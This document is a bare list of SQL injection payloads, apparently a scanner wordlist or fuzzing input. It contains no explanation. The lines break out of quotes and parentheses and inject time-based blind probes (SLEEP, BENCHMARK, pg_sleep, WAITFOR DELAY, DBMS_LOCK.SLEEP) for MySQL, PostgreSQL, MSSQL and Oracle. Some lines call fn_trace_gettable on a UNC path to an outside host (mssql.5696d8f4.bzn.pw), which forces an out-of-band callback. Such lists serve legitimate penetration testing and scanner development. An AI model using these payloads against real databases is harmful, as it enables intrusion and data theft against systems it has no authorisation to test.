'; select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default); /* 
'; select BENCHMARK(1000000,MD5('A'));  -- 
'; select BENCHMARK(1000000,MD5('A')); /* 
'; select SLEEP(10);  -- 
'; select SLEEP(10); /* 
'; select WAITFOR DELAY '00:00:10';  -- 
'; select WAITFOR DELAY '00:00:10'; /* 
'; select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default));  -- 
'; select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)); /* 
'; select pg_sleep(10) is not null;  -- 
'; select pg_sleep(10) is not null; /* 
'); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
'); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
'); WAITFOR DELAY '00:00:10';  -- 
'); WAITFOR DELAY '00:00:10'; /* 
'); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default);  -- 
'); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default); /* 
'); select BENCHMARK(1000000,MD5('A'));  -- 
'); select BENCHMARK(1000000,MD5('A')); /* 
'); select SLEEP(10);  -- 
'); select SLEEP(10); /* 
'); select WAITFOR DELAY '00:00:10';  -- 
'); select WAITFOR DELAY '00:00:10'; /* 
'); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default));  -- 
'); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)); /* 
'); select pg_sleep(10) is not null;  -- 
'); select pg_sleep(10) is not null; /* 
')); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
')); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
')); WAITFOR DELAY '00:00:10';  -- 
')); WAITFOR DELAY '00:00:10'; /* 
')); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default);  -- 
')); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default); /* 
')); select BENCHMARK(1000000,MD5('A'));  -- 
')); select BENCHMARK(1000000,MD5('A')); /* 
')); select SLEEP(10);  -- 
')); select SLEEP(10); /* 
')); select WAITFOR DELAY '00:00:10';  -- 
')); select WAITFOR DELAY '00:00:10'; /* 
')); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default));  -- 
')); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)); /* 
')); select pg_sleep(10) is not null;  -- 
')); select pg_sleep(10) is not null; /* 
'))); BEGIN DBMS_LOCK.SLEEP(10); END;;  -- 
'))); BEGIN DBMS_LOCK.SLEEP(10); END;; /* 
'))); WAITFOR DELAY '00:00:10';  -- 
'))); WAITFOR DELAY '00:00:10'; /* 
'))); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default);  -- 
'))); select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default); /* 
'))); select BENCHMARK(1000000,MD5('A'));  -- 
'))); select BENCHMARK(1000000,MD5('A')); /* 
'))); select SLEEP(10);  -- 
'))); select SLEEP(10); /* 
'))); select WAITFOR DELAY '00:00:10';  -- 
'))); select WAITFOR DELAY '00:00:10'; /* 
'))); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default));  -- 
'))); select (select * from fn_trace_gettable('mssql.5696d8f4.bzn.pw\1.trc',default)); /* 
'))); select pg_sleep(10) is not null;  -- 
'))); select pg_sleep(10) is not null; /* 